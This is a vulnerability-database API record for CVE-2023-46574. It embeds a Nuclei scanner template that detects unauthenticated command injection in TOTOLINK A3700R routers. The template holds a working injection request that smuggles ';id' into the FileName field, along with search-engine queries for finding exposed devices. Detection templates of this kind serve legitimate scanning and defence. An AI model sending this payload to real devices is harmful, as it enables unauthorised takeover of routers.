{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-46574/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-46574/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-46574/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-46574/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-46574/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-46574"},"sightings":{"href":"/api/v1/sightings/cve-2023-46574"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-46574.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2023-46574\n\ninfo:\n  name: TOTOLINK A3700R - Command Injection\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.\n  impact: |\n    Unauthenticated attackers can execute arbitrary commands on the router, potentially gaining full device control and compromising network security.\n  remediation: |\n    Update TOTOLINK A3700R firmware to a version newer than 9.1.2u.6165_20211012.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-46574\n    - https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md\n    - https://github.com/Marco-zcl/POC\n    - https://github.com/d4n-sec/d4n-sec.github.io\n    - https://github.com/wy876/POC\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-46574\n    cwe-id: CWE-77\n    epss-score: 0.65412\n    epss-percentile: 0.99235\n    cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: totolink\n    product: a3700r_firmware\n    shodan-query:\n      - title:\"Totolink\"\n      - http.title:\"totolink\"\n    fofa-query: title=\"totolink\"\n    google-query: intitle:\"totolink\"\n  tags: cve,cve2023,totolink,router,iot,rce,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"<title>TOTOLINK</title>\")'\n        condition: and\n\n  - raw:\n      - |\n        GET /cgi-bin/cstecgi.cgi HTTP/1.1\n        Host: {{Hostname}}\n\n        {\"topicurl\":\"UploadFirmwareFile\",\"FileName\":\";id\"}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100c73625c8d1c499d4bd8268059408b8f3ba021b97359aafa9c46edb32b9859ea202207f052f27a5d6d5ac25667b6b818b888fed096e51322085ddbe6afdcab37657d0:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-46574"}